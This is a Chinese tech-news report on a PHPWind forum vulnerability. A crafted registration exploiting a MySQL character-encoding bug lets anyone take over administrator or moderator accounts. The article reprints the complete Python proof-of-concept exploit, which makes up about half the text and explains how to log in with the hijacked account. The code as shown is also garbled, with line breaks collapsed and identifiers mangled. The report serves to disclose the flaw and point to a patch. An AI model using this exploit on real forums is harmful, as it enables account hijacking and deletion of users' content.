作者:左边
【赛迪网-IT技术报道】据悉:近日,国内知名的社区软件PHPWIND所有版本又现严重漏洞。黑客利用该漏洞可导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。目前PHPWIND已经向用户紧急发出最新安全补丁,广大站长及时下载与更新补丁包,并通知身边的站长。
详情:
漏洞发布:http://www.80sec.com/
漏洞作者:jianxin@80sec.com
漏洞厂商: http://www.phpwind.com/
PHPWind论坛系统是一套采用php+mysql数据库方式运行并可生成HTML页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。
本漏洞影响phpwind所有版本
漏洞危害:高
漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。
漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限。
漏洞测试:
[code]# -*- coding: gb2312 -*-import urllib2,httplib,syshttplib.HTTPConnection.debuglevel = 1cookIEs = urllib2.HTTPCookieProcessor()opener = urllib2.build_opener(cookies)def banner(): print "" print "########################################################" print "Phpwind所有版本管理权限泄露漏洞利用poc" print "Copyright (C) 2006" print "jianxin@80sec.com" print "80sec是一个新的致力于web安全的小团体" print "http://www.80sec.com"def usage(): banner() print "Usage:/n" print " $ ./phpwind.py pwforumurl usertoattack/n" print " pwforumurl 目标论坛地址如http://www.80sec.com/" print " usertoattack 目标拥有权限的斑竹或管理员" print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户" print " 最新版本可以使用uid登陆" print " 其他版本可以使用cookie+useragent登陆" print "########################################################" print ""argvs=sys.argvusage()data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" %(argvs[2],"%c1")pwurl = "%s/register.php" % argvs[1]request = urllib2.Request(url = pwurl , headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'}, data = data)f=opener.open(request)headers=f.headers.dictcookie=headers["set-cookie"]try:if cookie.index('winduser'):print "Exploit Success!"print "Login with uid passWord @80sec or Cookie:"print cookieprint "User-agent: 80sec owned this"except:print "Error! http://www.80sec.com"print "Connect root#80sec.com"[/code] |
PHPWind Forums 20080601 补丁发布(最后更新:20080601)(点击下载)
适用范围:数据库使用 mysql 4.1 以上版本
问题描述:由MySQL一个编码Bug产生的安全隐患,威胁到网站的安全运行。
(责任编辑:董建伟)
标签: